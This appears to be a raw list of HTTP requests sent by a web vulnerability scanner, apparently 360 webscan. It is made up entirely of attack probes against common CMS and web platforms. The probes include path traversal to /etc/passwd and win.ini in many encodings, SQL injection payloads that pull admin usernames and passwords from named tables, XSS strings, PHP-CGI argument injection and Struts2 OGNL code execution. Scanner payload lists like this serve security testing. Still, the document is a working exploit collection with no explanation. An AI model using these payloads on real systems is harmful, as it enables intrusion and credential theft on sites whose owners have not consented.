360 with get or post.list

GET /robots.txt
GET /
GET /index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
GET /
GET /nevercouldexistfilenosec
GET /nevercouldexistfilewebsec
GET /nevercouldexistfilenosec.aspx
GET /nevercouldexistfilewebsec.aspx
GET /nevercouldexistfilenosec.shtml
GET /nevercouldexistfilewebsec.shtml
GET /nevercouldexistfilenosec/
GET /nevercouldexistfilewebsec/
GET /nevercouldexistfilenosec.zip
GET /nevercouldexistfilewebsec.zip
GET /nevercouldexistfilenosec.php
GET /nevercouldexistfilewebsec.php
GET /nevercouldexistfilenosec.bak
GET /nevercouldexistfilewebsec.bak
GET /nevercouldexistfilenosec.rar
GET /nevercouldexistfilewebsec.rar
GET /
PUT /jsky_web_scanner_test_file.txt
GET /nosec_Web_Scanner_Test.dll
GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
GET /%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
GET /%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
GET /
GET /wp-admin
GET /admin.php
GET /..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
GET /dede/
GET /administrator/
GET /user
GET /..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
TRACE /TRACE_test
GET /..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
TRACK /TRACK_test
GET /..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
OPTIONS /
GET /_vti_bin/_vti_adm/admin.dll
GET /%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
GET /_vti_bin/_vti_aut/author.dll
GET /.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
GET /_vti_bin/shtml.exe?_vti_rpc
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
GET /server-info
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
GET /server-status
GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
GET /jmx-console/
GET /.../.../.../.../.../.../.../.../windows/win.ini
GET /web-console/
GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
GET /
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
GET /webscan360noThisFile*~1*/.aspx
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
POST /cgi-bin/php-cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
POST /cgi-bin/php.cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
POST /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
GET /etc/passwd
POST /cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
POST /cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /etc/passwd
GET /
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
GET /phpMyAdmin/show_config_errors.php
GET /..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
GET /phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
GET /..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
GET /xampp/index.php
GET /%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
GET /axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
GET /?search=just_test_not_find_href
GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
GET /$
GET /.../.../.../.../.../.../.../.../etc/passwd
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
GET /solr/dev/admin/
GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
GET /.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
GET /%3Cscript%3Ealert(42873).do
GET /
GET /level/15/exec/-/show/running-config/CR
GET /%3Cscript%20s%3Ealert(42873)
GET /plugins/weathermap/weathermap-cacti-plugin.php
GET /?%22onmouseover='prompt(42873)'bad=%22%3E
GET /
GET /%22%3E%3CsCrIpT%3Eprompt(42873)
GET /
GET /?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
GET /icons/index
GET /?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
GET /icons/small/index
GET /'IHLD
GET /
GET /
GET /
GET /install.php
GET /install/index.php
GET /
GET /fckeditor/editor/dialog/fck_about.html
GET /
GET /extras/curltest.php?url=file://curltest.php
GET /
GET /
GET /.svn/entries
GET /compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
GET /include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
GET /wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
GET /
GET /
POST /plus/carbuyaction.php
GET /plus/carbuyaction.php?dopost=return&code=../../index
GET /
GET /api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
GET /
GET /yp/product.php?q=&action=searchlist&where=%23
GET /invoker/EJBInvokerServlet/
GET /invoker/JMXInvokerServlet/
GET /indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20union%20all%20select%201,1,1,%200x73616665333,1,1,1,1,1,1,1,1,1
GET /
GET /yp/product.php?pagesize=$%7B@print(md5(42873))%7D
GET /index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+0x6A7573743A66696E6431,2,3,4,5,6--
GET /search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
GET /TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
GET /index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /
GET /_database/qiye_free.asp
GET /apps/include.php?file=index.php
GET /
GET /huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
GET /
GET /wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
POST /manage/login.php
HEAD /flow.php?step=login
GET /
GET /vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
GET /api/upload/swfthumbnail.php?id=../../include/common.inc.php
GET /Inc/conn.asp
POST /user/reg3.php
GET /News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
GET /
GET /celive/js/include.php?departmentid=webscan'&cmseasylive=1
GET /admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
GET /
GET /CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
GET /ask/search_ajax.php?q=s%bb%27
GET /yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
GET /
GET /yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
GET /web/?id=-1'
GET /huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0/**/--
GET /js/calendar.php?lang=../js
GET /xampp/showcode.php/showcode.php?showcode=1
GET /index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
POST /login.php
GET /admin/index.asp
GET /Jingdian/Jingdian_Show.Asp?Jingdian_Id=-1%20and%201=2%20union%20select%201,admin_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20UU_admin
GET /user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
GET /phpcms/data/js.php?id=1
GET /index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
GET /plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
GET /user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
GET /Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
GET /?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
GET /abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
GET /?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
GET /abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
GET /abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
GET /?user-getpass-1'
GET /?user-space-1'
POST /index.php
GET /admin/sysadmin_view.asp
GET /include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
POST /index.php?user-getpass
GET /common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
GET /admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
GET /member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
POST /register.php?do=submit
POST /management/login.asp
GET /index.php?-dauto_prepend_file%3d/etc/passwd+-n
POST /tools/ajax.aspx
GET /show.php?id=10%20and%201=2%20union%20select%201,2,concat(adminname,0x7c,adminpass,0x7c,CHAR(51,54,48,119,101,98,115,99,97,110)),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20eaea_admin%20limit%201
GET /admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
GET /bom.php?dir=.
GET /phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
GET /myly.aspx?username=test'%20and%20@@version%3E0--
GET /go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
POST /?product-gnotify
POST /Index.action
POST /index.action
POST /login.action
POST /index.php/api/xmlrpc
GET /CVS/Root
GET /mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
GET /index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
GET /index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
GET /plugin.php?id=Network114:Network114&ljtype=1%bf%27
GET /group/group.php?id=1%27webscan_draGxn
GET /dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
GET /index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
GET /index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
GET /category/1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
POST /upload/flow.php?step=update_cart
GET /user.php?act=is_registered&username=%CE%27360webscan%23
GET /do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
GET /do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
GET /zhuti/360webscan'
GET /js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
GET /js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
GET /search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
GET /WEB-INF/web.xml
GET /api.php?action=File&ctrl=download&path=api.php
GET /?/people/360webscan?notification_id-360webscan'
GET /?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
POST /fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
GET /down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
GET /admin/manageAPP.php
GET /index.php?m=poster&c=index&a=poster_click&id=1
GET /yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
GET /?/search/ajax/search_result/search_type-all__q-360webscan'
GET /?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
GET /index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
GET /api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
GET /wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
POST /do/s_rpc.php
POST /new2/s_rpc.php
POST /video/s_rpc.php
POST /photo/s_rpc.php
POST /news/s_rpc.php
GET /plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
GET /page/html/?360webscan'.html
GET /Admin/sqlPlatform/operateSql.aspx
GET /respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
GET /connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
GET /connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
GET /php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
GET /member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
GET /e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
GET /pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
GET /plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
GET /index.php?ac=search&at=taglist&tagkey=a%2527
GET /wap/index.php?ac=search&at=taglist&tagkey=a%2527
POST /ckeditor/samples/sample_posteddata.php
GET /plus/carbuyaction.php?dopost=return&code=../../tags
POST /?cart-ajaxadd
GET /do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
GET /index.php?ac=order&at=list
GET /ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
GET /ajax.php?act=verify_ecv&ecvsn=360scan%27
GET /include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
POST /m.php?m=User&a=doLogin
GET /api.php?act=1&appname=../../core/html/pages/about.html%00
GET /ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
GET /message.php?act=webscan'
GET /link.php?act=go&url=webscan.cn'
GET /showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
GET /showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
GET /include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /webscan_360_cn.html
GET /include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
GET /group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
GET /admin_aspcms/_content/_tag/aspcms_tag.asp
GET /admin_aspcms/index.asp
POST /admin_aspcms/_style/aspcms_stylefun.asp?action=edit
GET /do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
GET /webscan_360_cn.html
GET /index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /resin-doc/viewfile/?file=index.jsp
POST /portal.php?diy=yes%22%3E%3C/ScRiPt%3E%3CScRiPt%3Ealert(/webscan/)%3C/ScRiPt%3E
POST /includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
POST /api/uc_client/control/mail.php
GET /api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
GET /api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
